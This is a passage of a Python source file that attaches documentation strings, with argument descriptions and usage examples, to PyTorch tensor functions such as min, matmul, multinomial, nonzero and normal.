>>> torch.quantile(a, 0.4, interpolation='nearest')
tensor(1.)
""".format(**single_dim_common))
add_docstr(torch.nanquantile, r"""
nanquantile(input, q, dim=None, keepdim=False, *, interpolation='linear', out=None) -> Tensor
This is a variant of :func:`torch.quantile` that "ignores" ``NaN`` values,
computing the quantiles :attr:`q` as if ``NaN`` values in :attr:`input` did
not exist. If all values in a reduced row are ``NaN`` then the quantiles for
that reduction will be ``NaN``. See the documentation for :func:`torch.quantile`.
Args:
{input}
q (float or Tensor): a scalar or 1D tensor of quantile values in the range [0, 1]
{dim}
{keepdim}
Keyword arguments:
interpolation (string): interpolation method to use when the desired quantile lies between two data points.
Can be ``linear``, ``lower``, ``higher``, ``midpoint`` and ``nearest``.
Default is ``linear``.
{out}
Example::
>>> t = torch.tensor([float('nan'), 1, 2])
>>> t.quantile(0.5)
tensor(nan)
>>> t.nanquantile(0.5)
tensor(1.5000)
>>> t = torch.tensor([[float('nan'), float('nan')], [1, 2]])
>>> t
tensor([[nan, nan],
[1., 2.]])
>>> t.nanquantile(0.5, dim=0)
tensor([1., 2.])
>>> t.nanquantile(0.5, dim=1)
tensor([ nan, 1.5000])
""".format(**single_dim_common))
add_docstr(torch.min,
r"""
min(input) -> Tensor
Returns the minimum value of all elements in the :attr:`input` tensor.
.. warning::
This function produces deterministic (sub)gradients unlike ``min(dim=0)``
Args:
{input}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[ 0.6750, 1.0857, 1.7197]])
>>> torch.min(a)
tensor(0.6750)
.. function:: min(input, dim, keepdim=False, *, out=None) -> (Tensor, LongTensor)
:noindex:
Returns a namedtuple ``(values, indices)`` where ``values`` is the minimum
value of each row of the :attr:`input` tensor in the given dimension
:attr:`dim`. And ``indices`` is the index location of each minimum value found
(argmin).
If :attr:`keepdim` is ``True``, the output tensors are of the same size as
:attr:`input` except in the dimension :attr:`dim` where they are of size 1.
Otherwise, :attr:`dim` is squeezed (see :func:`torch.squeeze`), resulting in
the output tensors having 1 fewer dimension than :attr:`input`.
.. note:: If there are multiple minimal values in a reduced row then
the indices of the first minimal value are returned.
Args:
{input}
{dim}
{keepdim}
Keyword args:
out (tuple, optional): the tuple of two output tensors (min, min_indices)
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[-0.6248, 1.1334, -1.1899, -0.2803],
[-1.4644, -0.2635, -0.3651, 0.6134],
[ 0.2457, 0.0384, 1.0128, 0.7015],
[-0.1153, 2.9849, 2.1458, 0.5788]])
>>> torch.min(a, 1)
torch.return_types.min(values=tensor([-1.1899, -1.4644, 0.0384, -0.1153]), indices=tensor([2, 0, 1, 0]))
.. function:: min(input, other, *, out=None) -> Tensor
:noindex:
See :func:`torch.minimum`.
""".format(**single_dim_common))
add_docstr(torch.minimum, r"""
minimum(input, other, *, out=None) -> Tensor
Computes the element-wise minimum of :attr:`input` and :attr:`other`.
.. note::
If one of the elements being compared is a NaN, then that element is returned.
:func:`minimum` is not supported for tensors with complex dtypes.
Args:
{input}
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.tensor((1, 2, -1))
>>> b = torch.tensor((3, 0, 4))
>>> torch.minimum(a, b)
tensor([1, 0, -1])
""".format(**common_args))
add_docstr(torch.fmin, r"""
fmin(input, other, *, out=None) -> Tensor
Computes the element-wise minimum of :attr:`input` and :attr:`other`.
This is like :func:`torch.minimum` except it handles NaNs differently:
if exactly one of the two elements being compared is a NaN then the non-NaN element is taken as the minimum.
Only if both elements are NaN is NaN propagated.
This function is a wrapper around C++'s ``std::fmin`` and is similar to NumPy's ``fmin`` function.
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer and floating-point inputs.
Args:
{input}
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> a = torch.tensor([2.2, float('nan'), 2.1, float('nan')])
>>> b = torch.tensor([-9.3, 0.1, float('nan'), float('nan')])
>>> torch.fmin(a, b)
tensor([-9.3000, 0.1000, 2.1000, nan])
""".format(**common_args))
add_docstr(torch.amin,
r"""
amin(input, dim, keepdim=False, *, out=None) -> Tensor
Returns the minimum value of each slice of the :attr:`input` tensor in the given
dimension(s) :attr:`dim`.
.. note::
The difference between ``max``/``min`` and ``amax``/``amin`` is:
- ``amax``/``amin`` supports reducing on multiple dimensions,
- ``amax``/``amin`` does not return indices,
- ``amax``/``amin`` evenly distributes gradient between equal values,
while ``max(dim)``/``min(dim)`` propagates gradient only to a single
index in the source tensor.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{out}
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.6451, -0.4866, 0.2987, -1.3312],
[-0.5744, 1.2980, 1.8397, -0.2713],
[ 0.9128, 0.9214, -1.7268, -0.2995],
[ 0.9023, 0.4853, 0.9075, -1.6165]])
>>> torch.amin(a, 1)
tensor([-1.3312, -0.5744, -1.7268, -1.6165])
""".format(**multi_dim_common))
add_docstr(torch.aminmax, r"""
aminmax(input, *, dim=None, keepdim=False, out=None) -> (Tensor min, Tensor max)
Computes the minimum and maximum values of the :attr:`input` tensor.
Args:
input (Tensor):
The input tensor
Keyword Args:
dim (Optional[int]):
The dimension along which to compute the values. If `None`,
computes the values over the entire :attr:`input` tensor.
Default is `None`.
keepdim (bool):
If `True`, the reduced dimensions will be kept in the output
tensor as dimensions with size 1 for broadcasting, otherwise
they will be removed, as if calling :func:`torch.squeeze`.
Default is `False`.
out (Optional[Tuple[Tensor, Tensor]]):
Optional tensors on which to write the result. Must have the same
shape and dtype as the expected output.
Default is `None`.
Returns:
A named tuple `(min, max)` containing the minimum and maximum values.
Raises:
RuntimeError
If any of the dimensions to compute the values over has size 0.
.. note::
NaN values are propagated to the output if at least one value is NaN.
.. seealso::
:func:`torch.amin` computes just the minimum value
:func:`torch.amax` computes just the maximum value
Example::
>>> torch.aminmax(torch.tensor([1, -3, 5]))
torch.return_types.aminmax(
min=tensor(-3),
max=tensor(5))
>>> # aminmax propagates NaNs
>>> torch.aminmax(torch.tensor([1, -3, 5, torch.nan]))
torch.return_types.aminmax(
min=tensor(nan),
max=tensor(nan))
>>> t = torch.arange(10).view(2, 5)
>>> t
tensor([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
>>> t.aminmax(dim=0, keepdim=True)
torch.return_types.aminmax(
min=tensor([[0, 1, 2, 3, 4]]),
max=tensor([[5, 6, 7, 8, 9]]))
""")
add_docstr(torch.argmin,
r"""
argmin(input, dim=None, keepdim=False) -> LongTensor
Returns the indices of the minimum value(s) of the flattened tensor or along a dimension.
This is the second value returned by :meth:`torch.min`. See its
documentation for the exact semantics of this method.
.. note:: If there are multiple minimal values then the indices of the first minimal value are returned.
Args:
{input}
{dim} If ``None``, the argmin of the flattened input is returned.
{keepdim} Ignored if ``dim=None``.
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.1139, 0.2254, -0.1381, 0.3687],
[ 1.0100, -1.1975, -0.0102, -0.4732],
[-0.9240, 0.1207, -0.7506, -1.0213],
[ 1.7809, -1.2960, 0.9384, 0.1438]])
>>> torch.argmin(a)
tensor(13)
>>> torch.argmin(a, dim=1)
tensor([ 2, 1, 3, 1])
>>> torch.argmin(a, dim=1, keepdim=True)
tensor([[2],
[1],
[3],
[1]])
""".format(**single_dim_common))
add_docstr(torch.mm,
r"""
mm(input, mat2, *, out=None) -> Tensor
Performs a matrix multiplication of the matrices :attr:`input` and :attr:`mat2`.
If :attr:`input` is a :math:`(n \times m)` tensor, :attr:`mat2` is a
:math:`(m \times p)` tensor, :attr:`out` will be a :math:`(n \times p)` tensor.
.. note:: This function does not :ref:`broadcast <broadcasting-semantics>`.
For broadcasting matrix products, see :func:`torch.matmul`.
Supports strided and sparse 2-D tensors as inputs, autograd with
respect to strided inputs.
{tf32_note}
Args:
input (Tensor): the first matrix to be matrix multiplied
mat2 (Tensor): the second matrix to be matrix multiplied
Keyword args:
{out}
Example::
>>> mat1 = torch.randn(2, 3)
>>> mat2 = torch.randn(3, 3)
>>> torch.mm(mat1, mat2)
tensor([[ 0.4851, 0.5037, -0.3633],
[-0.0760, -3.6705, 2.4784]])
""".format(**common_args, **tf32_notes))
add_docstr(torch.hspmm,
r"""
hspmm(mat1, mat2, *, out=None) -> Tensor
Performs a matrix multiplication of a :ref:`sparse COO matrix
<sparse-coo-docs>` :attr:`mat1` and a strided matrix :attr:`mat2`. The
result is a (1 + 1)-dimensional :ref:`hybrid COO matrix
<sparse-hybrid-coo-docs>`.
Args:
mat1 (Tensor): the first sparse matrix to be matrix multiplied
mat2 (Tensor): the second strided matrix to be matrix multiplied
Keyword args:
{out}
""".format(**common_args))
add_docstr(torch.matmul,
r"""
matmul(input, other, *, out=None) -> Tensor
Matrix product of two tensors.
The behavior depends on the dimensionality of the tensors as follows:
- If both tensors are 1-dimensional, the dot product (scalar) is returned.
- If both arguments are 2-dimensional, the matrix-matrix product is returned.
- If the first argument is 1-dimensional and the second argument is 2-dimensional,
a 1 is prepended to its dimension for the purpose of the matrix multiply.
After the matrix multiply, the prepended dimension is removed.
- If the first argument is 2-dimensional and the second argument is 1-dimensional,
the matrix-vector product is returned.
- If both arguments are at least 1-dimensional and at least one argument is
N-dimensional (where N > 2), then a batched matrix multiply is returned. If the first
argument is 1-dimensional, a 1 is prepended to its dimension for the purpose of the
batched matrix multiply and removed after. If the second argument is 1-dimensional, a
1 is appended to its dimension for the purpose of the batched matrix multiply and removed after.
The non-matrix (i.e. batch) dimensions are :ref:`broadcasted <broadcasting-semantics>` (and thus
must be broadcastable). For example, if :attr:`input` is a
:math:`(j \times 1 \times n \times n)` tensor and :attr:`other` is a :math:`(k \times n \times n)`
tensor, :attr:`out` will be a :math:`(j \times k \times n \times n)` tensor.
Note that the broadcasting logic only looks at the batch dimensions when determining if the inputs
are broadcastable, and not the matrix dimensions. For example, if :attr:`input` is a
:math:`(j \times 1 \times n \times m)` tensor and :attr:`other` is a :math:`(k \times m \times p)`
tensor, these inputs are valid for broadcasting even though the final two dimensions (i.e. the
matrix dimensions) are different. :attr:`out` will be a :math:`(j \times k \times n \times p)` tensor.
{tf32_note}
.. note::
The 1-dimensional dot product version of this function does not support an :attr:`out` parameter.
Arguments:
input (Tensor): the first tensor to be multiplied
other (Tensor): the second tensor to be multiplied
Keyword args:
{out}
Example::
>>> # vector x vector
>>> tensor1 = torch.randn(3)
>>> tensor2 = torch.randn(3)
>>> torch.matmul(tensor1, tensor2).size()
torch.Size([])
>>> # matrix x vector
>>> tensor1 = torch.randn(3, 4)
>>> tensor2 = torch.randn(4)
>>> torch.matmul(tensor1, tensor2).size()
torch.Size([3])
>>> # batched matrix x broadcasted vector
>>> tensor1 = torch.randn(10, 3, 4)
>>> tensor2 = torch.randn(4)
>>> torch.matmul(tensor1, tensor2).size()
torch.Size([10, 3])
>>> # batched matrix x batched matrix
>>> tensor1 = torch.randn(10, 3, 4)
>>> tensor2 = torch.randn(10, 4, 5)
>>> torch.matmul(tensor1, tensor2).size()
torch.Size([10, 3, 5])
>>> # batched matrix x broadcasted matrix
>>> tensor1 = torch.randn(10, 3, 4)
>>> tensor2 = torch.randn(4, 5)
>>> torch.matmul(tensor1, tensor2).size()
torch.Size([10, 3, 5])
""".format(**common_args, **tf32_notes))
add_docstr(torch.mode,
r"""
mode(input, dim=-1, keepdim=False, *, out=None) -> (Tensor, LongTensor)
Returns a namedtuple ``(values, indices)`` where ``values`` is the mode
value of each row of the :attr:`input` tensor in the given dimension
:attr:`dim`, i.e. a value which appears most often
in that row, and ``indices`` is the index location of each mode value found.
By default, :attr:`dim` is the last dimension of the :attr:`input` tensor.
If :attr:`keepdim` is ``True``, the output tensors are of the same size as
:attr:`input` except in the dimension :attr:`dim` where they are of size 1.
Otherwise, :attr:`dim` is squeezed (see :func:`torch.squeeze`), resulting
in the output tensors having 1 fewer dimension than :attr:`input`.
.. note:: This function is not defined for ``torch.cuda.Tensor`` yet.
Args:
{input}
{dim}
{keepdim}
Keyword args:
out (tuple, optional): the result tuple of two output tensors (values, indices)
Example::
>>> a = torch.randint(10, (5,))
>>> a
tensor([6, 5, 1, 0, 2])
>>> b = a + (torch.randn(50, 1) * 5).long()
>>> torch.mode(b, 0)
torch.return_types.mode(values=tensor([6, 5, 1, 0, 2]), indices=tensor([2, 2, 2, 2, 2]))
""".format(**single_dim_common))
add_docstr(torch.mul, r"""
mul(input, other, *, out=None) -> Tensor
Multiplies :attr:`input` by :attr:`other`.
.. math::
\text{out}_i = \text{input}_i \times \text{other}_i
""" + r"""
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer, float, and complex inputs.
Args:
{input}
other (Tensor or Number): the tensor or number to multiply input by.
Keyword args:
{out}
Examples::
>>> a = torch.randn(3)
>>> a
tensor([ 0.2015, -0.4255, 2.6087])
>>> torch.mul(a, 100)
tensor([ 20.1494, -42.5491, 260.8663])
>>> b = torch.randn(4, 1)
>>> b
tensor([[ 1.1207],
[-0.3137],
[ 0.0700],
[ 0.8378]])
>>> c = torch.randn(1, 4)
>>> c
tensor([[ 0.5146, 0.1216, -0.5244, 2.2382]])
>>> torch.mul(b, c)
tensor([[ 0.5767, 0.1363, -0.5877, 2.5083],
[-0.1614, -0.0382, 0.1645, -0.7021],
[ 0.0360, 0.0085, -0.0367, 0.1567],
[ 0.4312, 0.1019, -0.4394, 1.8753]])
""".format(**common_args))
add_docstr(torch.multiply, r"""
multiply(input, other, *, out=None)
Alias for :func:`torch.mul`.
""")
add_docstr(torch.multinomial,
r"""
multinomial(input, num_samples, replacement=False, *, generator=None, out=None) -> LongTensor
Returns a tensor where each row contains :attr:`num_samples` indices sampled
from the multinomial probability distribution located in the corresponding row
of tensor :attr:`input`.
.. note::
The rows of :attr:`input` do not need to sum to one (in which case we use
the values as weights), but must be non-negative, finite and have
a non-zero sum.
Indices are ordered from left to right according to when each was sampled
(first samples are placed in first column).
If :attr:`input` is a vector, :attr:`out` is a vector of size :attr:`num_samples`.
If :attr:`input` is a matrix with `m` rows, :attr:`out` is a matrix of shape
:math:`(m \times \text{{num\_samples}})`.
If replacement is ``True``, samples are drawn with replacement.
If not, they are drawn without replacement, which means that when a
sample index is drawn for a row, it cannot be drawn again for that row.
.. note::
When drawn without replacement, :attr:`num_samples` must be lower than
the number of non-zero elements in :attr:`input` (or the min number of non-zero
elements in each row of :attr:`input` if it is a matrix).
Args:
input (Tensor): the input tensor containing probabilities
num_samples (int): number of samples to draw
replacement (bool, optional): whether to draw with replacement or not
Keyword args:
{generator}
{out}
Example::
>>> weights = torch.tensor([0, 10, 3, 0], dtype=torch.float) # create a tensor of weights
>>> torch.multinomial(weights, 2)
tensor([1, 2])
>>> torch.multinomial(weights, 4) # ERROR!
RuntimeError: invalid argument 2: invalid multinomial distribution (with replacement=False,
not enough non-negative category to sample) at ../aten/src/TH/generic/THTensorRandom.cpp:320
>>> torch.multinomial(weights, 4, replacement=True)
tensor([ 2, 1, 1, 1])
""".format(**common_args))
add_docstr(torch.mv,
r"""
mv(input, vec, *, out=None) -> Tensor
Performs a matrix-vector product of the matrix :attr:`input` and the vector
:attr:`vec`.
If :attr:`input` is a :math:`(n \times m)` tensor, :attr:`vec` is a 1-D tensor of
size :math:`m`, :attr:`out` will be 1-D of size :math:`n`.
.. note:: This function does not :ref:`broadcast <broadcasting-semantics>`.
Args:
input (Tensor): matrix to be multiplied
vec (Tensor): vector to be multiplied
Keyword args:
{out}
Example::
>>> mat = torch.randn(2, 3)
>>> vec = torch.randn(3)
>>> torch.mv(mat, vec)
tensor([ 1.0404, -0.6361])
""".format(**common_args))
add_docstr(torch.mvlgamma,
r"""
mvlgamma(input, p, *, out=None) -> Tensor
Alias for :func:`torch.special.multigammaln`.
""")
add_docstr(torch.movedim, r"""
movedim(input, source, destination) -> Tensor
Moves the dimension(s) of :attr:`input` at the position(s) in :attr:`source`
to the position(s) in :attr:`destination`.
Other dimensions of :attr:`input` that are not explicitly moved remain in
their original order and appear at the positions not specified in :attr:`destination`.
Args:
{input}
source (int or tuple of ints): Original positions of the dims to move. These must be unique.
destination (int or tuple of ints): Destination positions for each of the original dims. These must also be unique.
Examples::
>>> t = torch.randn(3,2,1)
>>> t
tensor([[[-0.3362],
[-0.8437]],
[[-0.9627],
[ 0.1727]],
[[ 0.5173],
[-0.1398]]])
>>> torch.movedim(t, 1, 0).shape
torch.Size([2, 3, 1])
>>> torch.movedim(t, 1, 0)
tensor([[[-0.3362],
[-0.9627],
[ 0.5173]],
[[-0.8437],
[ 0.1727],
[-0.1398]]])
>>> torch.movedim(t, (1, 2), (0, 1)).shape
torch.Size([2, 1, 3])
>>> torch.movedim(t, (1, 2), (0, 1))
tensor([[[-0.3362, -0.9627, 0.5173]],
[[-0.8437, 0.1727, -0.1398]]])
""".format(**common_args))
add_docstr(torch.moveaxis, r"""
moveaxis(input, source, destination) -> Tensor
Alias for :func:`torch.movedim`.
This function is equivalent to NumPy's moveaxis function.
Examples::
>>> t = torch.randn(3,2,1)
>>> t
tensor([[[-0.3362],
[-0.8437]],
[[-0.9627],
[ 0.1727]],
[[ 0.5173],
[-0.1398]]])
>>> torch.moveaxis(t, 1, 0).shape
torch.Size([2, 3, 1])
>>> torch.moveaxis(t, 1, 0)
tensor([[[-0.3362],
[-0.9627],
[ 0.5173]],
[[-0.8437],
[ 0.1727],
[-0.1398]]])
>>> torch.moveaxis(t, (1, 2), (0, 1)).shape
torch.Size([2, 1, 3])
>>> torch.moveaxis(t, (1, 2), (0, 1))
tensor([[[-0.3362, -0.9627, 0.5173]],
[[-0.8437, 0.1727, -0.1398]]])
""".format(**common_args))
add_docstr(torch.swapdims, r"""
swapdims(input, dim0, dim1) -> Tensor
Alias for :func:`torch.transpose`.
This function is equivalent to NumPy's swapaxes function.
Examples::
>>> x = torch.tensor([[[0,1],[2,3]],[[4,5],[6,7]]])
>>> x
tensor([[[0, 1],
[2, 3]],
[[4, 5],
[6, 7]]])
>>> torch.swapdims(x, 0, 1)
tensor([[[0, 1],
[4, 5]],
[[2, 3],
[6, 7]]])
>>> torch.swapdims(x, 0, 2)
tensor([[[0, 4],
[2, 6]],
[[1, 5],
[3, 7]]])
""".format(**common_args))
add_docstr(torch.swapaxes, r"""
swapaxes(input, axis0, axis1) -> Tensor
Alias for :func:`torch.transpose`.
This function is equivalent to NumPy's swapaxes function.
Examples::
>>> x = torch.tensor([[[0,1],[2,3]],[[4,5],[6,7]]])
>>> x
tensor([[[0, 1],
[2, 3]],
[[4, 5],
[6, 7]]])
>>> torch.swapaxes(x, 0, 1)
tensor([[[0, 1],
[4, 5]],
[[2, 3],
[6, 7]]])
>>> torch.swapaxes(x, 0, 2)
tensor([[[0, 4],
[2, 6]],
[[1, 5],
[3, 7]]])
""".format(**common_args))
add_docstr(torch.narrow,
r"""
narrow(input, dim, start, length) -> Tensor
Returns a new tensor that is a narrowed version of the :attr:`input` tensor. The
dimension :attr:`dim` spans the elements from :attr:`start` to ``start + length``
(exclusive). The returned tensor and :attr:`input` tensor share the same underlying storage.
Args:
input (Tensor): the tensor to narrow
dim (int): the dimension along which to narrow
start (int): the index at which to start the narrowed dimension
length (int): the length of the narrowed dimension
Example::
>>> x = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
>>> torch.narrow(x, 0, 0, 2)
tensor([[ 1, 2, 3],
[ 4, 5, 6]])
>>> torch.narrow(x, 1, 1, 2)
tensor([[ 2, 3],
[ 5, 6],
[ 8, 9]])
""")
add_docstr(torch.nan_to_num,
r"""
nan_to_num(input, nan=0.0, posinf=None, neginf=None, *, out=None) -> Tensor
Replaces :literal:`NaN`, positive infinity, and negative infinity values in :attr:`input`
with the values specified by :attr:`nan`, :attr:`posinf`, and :attr:`neginf`, respectively.
By default, :literal:`NaN`\ s are replaced with zero, positive infinity is replaced with the
greatest finite value representable by :attr:`input`'s dtype, and negative infinity
is replaced with the least finite value representable by :attr:`input`'s dtype.
Args:
{input}
nan (Number, optional): the value to replace :literal:`NaN`\s with. Default is zero.
posinf (Number, optional): if a Number, the value to replace positive infinity values with.
If None, positive infinity values are replaced with the greatest finite value representable by :attr:`input`'s dtype.
Default is None.
neginf (Number, optional): if a Number, the value to replace negative infinity values with.
If None, negative infinity values are replaced with the lowest finite value representable by :attr:`input`'s dtype.
Default is None.
Keyword args:
{out}
Example::
>>> x = torch.tensor([float('nan'), float('inf'), -float('inf'), 3.14])
>>> torch.nan_to_num(x)
tensor([ 0.0000e+00, 3.4028e+38, -3.4028e+38, 3.1400e+00])
>>> torch.nan_to_num(x, nan=2.0)
tensor([ 2.0000e+00, 3.4028e+38, -3.4028e+38, 3.1400e+00])
>>> torch.nan_to_num(x, nan=2.0, posinf=1.0)
tensor([ 2.0000e+00, 1.0000e+00, -3.4028e+38, 3.1400e+00])
""".format(**common_args))
add_docstr(torch.ne, r"""
ne(input, other, *, out=None) -> Tensor
Computes :math:`\text{input} \neq \text{other}` element-wise.
""" + r"""
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or float): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is not equal to :attr:`other` and False elsewhere
Example::
>>> torch.ne(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[False, True], [True, False]])
""".format(**common_args))
add_docstr(torch.not_equal, r"""
not_equal(input, other, *, out=None) -> Tensor
Alias for :func:`torch.ne`.
""")
add_docstr(torch.neg,
r"""
neg(input, *, out=None) -> Tensor
Returns a new tensor with the negative of the elements of :attr:`input`.
.. math::
\text{out} = -1 \times \text{input}
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(5)
>>> a
tensor([ 0.0090, -0.2262, -0.0682, -0.2866, 0.3940])
>>> torch.neg(a)
tensor([-0.0090, 0.2262, 0.0682, 0.2866, -0.3940])
""".format(**common_args))
add_docstr(torch.negative,
r"""
negative(input, *, out=None) -> Tensor
Alias for :func:`torch.neg`
""")
add_docstr(torch.nextafter,
r"""
nextafter(input, other, *, out=None) -> Tensor
Return the next floating-point value after :attr:`input` towards :attr:`other`, elementwise.
The shapes of ``input`` and ``other`` must be
:ref:`broadcastable <broadcasting-semantics>`.
Args:
input (Tensor): the first input tensor
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> eps = torch.finfo(torch.float32).eps
>>> torch.nextafter(torch.tensor([1.0, 2.0]), torch.tensor([2.0, 1.0])) == torch.tensor([eps + 1, 2 - eps])
tensor([True, True])
""".format(**common_args))
add_docstr(torch.nonzero,
r"""
nonzero(input, *, out=None, as_tuple=False) -> LongTensor or tuple of LongTensors
.. note::
:func:`torch.nonzero(..., as_tuple=False) <torch.nonzero>` (default) returns a
2-D tensor where each row is the index for a nonzero value.
:func:`torch.nonzero(..., as_tuple=True) <torch.nonzero>` returns a tuple of 1-D
index tensors, allowing for advanced indexing, so ``x[x.nonzero(as_tuple=True)]``
gives all nonzero values of tensor ``x``. Of the returned tuple, each index tensor
contains nonzero indices for a certain dimension.
See below for more details on the two behaviors.
When :attr:`input` is on CUDA, :func:`torch.nonzero() <torch.nonzero>` causes
host-device synchronization.
**When** :attr:`as_tuple` **is** ``False`` **(default)**:
Returns a tensor containing the indices of all non-zero elements of
:attr:`input`. Each row in the result contains the indices of a non-zero
element in :attr:`input`. The result is sorted lexicographically, with
the last index changing the fastest (C-style).
If :attr:`input` has :math:`n` dimensions, then the resulting indices tensor
:attr:`out` is of size :math:`(z \times n)`, where :math:`z` is the total number of
non-zero elements in the :attr:`input` tensor.
**When** :attr:`as_tuple` **is** ``True``:
Returns a tuple of 1-D tensors, one for each dimension in :attr:`input`,
each containing the indices (in that dimension) of all non-zero elements of
:attr:`input` .
If :attr:`input` has :math:`n` dimensions, then the resulting tuple contains :math:`n`
tensors of size :math:`z`, where :math:`z` is the total number of
non-zero elements in the :attr:`input` tensor.
As a special case, when :attr:`input` has zero dimensions and a nonzero scalar
value, it is treated as a one-dimensional tensor with one element.
Args:
{input}
Keyword args:
out (LongTensor, optional): the output tensor containing indices
Returns:
LongTensor or tuple of LongTensor: If :attr:`as_tuple` is ``False``, the output
tensor containing indices. If :attr:`as_tuple` is ``True``, one 1-D tensor for
each dimension, containing the indices of each nonzero element along that
dimension.
Example::
>>> torch.nonzero(torch.tensor([1, 1, 1, 0, 1]))
tensor([[ 0],
[ 1],
[ 2],
[ 4]])
>>> torch.nonzero(torch.tensor([[0.6, 0.0, 0.0, 0.0],
... [0.0, 0.4, 0.0, 0.0],
... [0.0, 0.0, 1.2, 0.0],
... [0.0, 0.0, 0.0,-0.4]]))
tensor([[ 0, 0],
[ 1, 1],
[ 2, 2],
[ 3, 3]])
>>> torch.nonzero(torch.tensor([1, 1, 1, 0, 1]), as_tuple=True)
(tensor([0, 1, 2, 4]),)
>>> torch.nonzero(torch.tensor([[0.6, 0.0, 0.0, 0.0],
... [0.0, 0.4, 0.0, 0.0],
... [0.0, 0.0, 1.2, 0.0],
... [0.0, 0.0, 0.0,-0.4]]), as_tuple=True)
(tensor([0, 1, 2, 3]), tensor([0, 1, 2, 3]))
>>> torch.nonzero(torch.tensor(5), as_tuple=True)
(tensor([0]),)
""".format(**common_args))
add_docstr(torch.normal,
r"""
normal(mean, std, *, generator=None, out=None) -> Tensor
Returns a tensor of random numbers drawn from separate normal distributions
whose mean and standard deviation are given.
The :attr:`mean` is a tensor with the mean of
each output element's normal distribution
The :attr:`std` is a tensor with the standard deviation of
each output element's normal distribution
The shapes of :attr:`mean` and :attr:`std` don't need to match, but the
total number of elements in each tensor needs to be the same.
.. note:: When the shapes do not match, the shape of :attr:`mean`
is used as the shape for the returned output tensor.
.. note:: When :attr:`std` is a CUDA tensor, this function synchronizes
its device with the CPU.
Args:
mean (Tensor): the tensor of per-element means
std (Tensor): the tensor of per-element standard deviations
Keyword args:
{generator}
{out}
Example::
>>> torch.normal(mean=torch.arange(1., 11.), std=torch.arange(1, 0, -0.1))
tensor([ 1.0425, 3.5672, 2.7969, 4.2925, 4.7229, 6.2134,
8.0505, 8.1408, 9.0563, 10.0566])
.. function:: normal(mean=0.0, std, *, out=None) -> Tensor
:noindex:
Similar to the function above, but the means are shared among all drawn
elements.
Args:
mean (float, optional): the mean for all distributions
std (Tensor): the tensor of per-element standard deviations
Keyword args:
{out}
Example::
>>> torch.normal(mean=0.5, std=torch.arange(1., 6.))
tensor([-1.2793, -1.0732, -2.0687, 5.1177, -1.2303])
.. function:: normal(mean, std=1.0, *, out=None) -> Tensor
:noindex:
Similar to the function above, but the standard deviations are shared among
all drawn elements.
Args:
mean (Tensor): the tensor of per-element means
std (float, optional): the standard deviation for all distributions
Keyword args:
out (Tensor, optional): the output tensor
Example::
>>> torch.normal(mean=torch.arange(1., 6.))
tensor([ 1.1552, 2.6148, 2.6535, 5.8318, 4.2361])
.. function:: normal(mean, std, size, *, out=None) -> Tensor
:noindex:
Similar to the function above, but the means and standard deviations are shared
among all drawn elements. The resulting tensor has size given by :attr:`size`.
Args:
mean (float): the mean for all distributions
std (float): the standard deviation for all distributions
size (int...): a sequence of integers defining the shape of the output tensor.
Keyword args:
{out}
Example::
>>> torch.normal(2, 3, size=(1, 4))
tensor([[-1.3987, -1.9544, 3.6048, 0.7909]])
""".format(**common_args))
add_docstr(torch.numel,
r"""
numel(input) -> int
Returns the total number of elements in the :attr:`input` tensor.
Args:
{input}
Example::
>>> a = torch.randn(1, 2, 3, 4, 5)
>>> torch.numel(a)
120
>>> a = torch.zeros(4,4)
>>> torch.numel(a)
16
""".format(**common_args))
add_docstr(torch.ones,
r"""
ones(*size, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a tensor filled with the scalar value `1`, with the shape defined
by the variable argument :attr:`size`.
Args:
size (int...): a sequence of integers defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple.
Keyword arguments:
{out}
{dtype}
{layout}
{device}
{requires_grad}
Example::
>>> torch.ones(2, 3)
tensor([[ 1., 1., 1.],
[ 1., 1., 1.]])
>>> torch.ones(5)
tensor([ 1., 1., 1., 1., 1.])
""".format(**factory_common_args))
add_docstr(torch.ones_like,
r"""
ones_like(input, *, dtype=None, layout=None, device=None, requires_grad=False, memory_format=torch.preserve_format) -> Tensor
Returns a tensor filled with the scalar value `1`, with the same size as
:attr:`input`. ``torch.ones_like(input)`` is equivalent to
``torch.ones(input.size(), dtype=input.dtype, layout=input.layout, device=input.device)``.
.. warning::
As of 0.4, this function does not support an :attr:`out` keyword. As an alternative,
the old ``torch.ones_like(input, out=output)`` is equivalent to
``torch.ones(input.size(), out=output)``.
Args:
{input}
Keyword arguments:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
Example::
>>> input = torch.empty(2, 3)
>>> torch.ones_like(input)
tensor([[ 1., 1., 1.],
[ 1., 1., 1.]])
""".format(**factory_like_common_args))
add_docstr(torch.orgqr,
r"""
orgqr(input, tau) -> Tensor
Alias for :func:`torch.linalg.householder_product`.
""")
add_docstr(torch.ormqr,
r"""
ormqr(input, tau, other, left=True, transpose=False, *, out=None) -> Tensor
Computes the matrix-matrix multiplication of a product of Householder matrices with a general matrix.
Multiplies a :math:`m \times n` matrix `C` (given by :attr:`other`) with a matrix `Q`,
where `Q` is represented using Householder reflectors `(input, tau)`.
See `Representation of Orthogonal or Unitary Matrices`_ for further details.
If :attr:`left` is `True` then `op(Q)` times `C` is computed, otherwise the result is `C` times `op(Q)`.
When :attr:`left` is `True`, the implicit matrix `Q` has size :math:`m \times m`.
It has size :math:`n \times n` otherwise.
